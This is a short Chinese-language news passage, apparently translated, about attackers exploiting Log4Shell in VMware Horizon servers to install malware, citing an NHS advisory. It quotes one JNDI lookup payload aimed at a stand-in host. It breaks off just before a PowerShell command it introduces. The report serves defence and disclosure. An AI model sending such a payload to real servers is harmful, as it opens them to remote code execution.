犯罪分子正在积极利用运行VMware Horizo n的服务器的高度严重性log4shell漏洞,以便安装恶意软件,该软件允许他们能够完全控制受影响的系统,英国的公共资助的医疗保健系统是警告。
“攻击很可能通过类似于$ {jndi:ldap://example.com}的log4shell有效载荷来启动,”NHS咨询说明。 “该攻击利用嵌入在VMware Horizo n内的Apache Tomcat服务中的Log4shell漏洞。然后,它启动以下PowerShell命令,从WS_TOMCATService.exe生成:“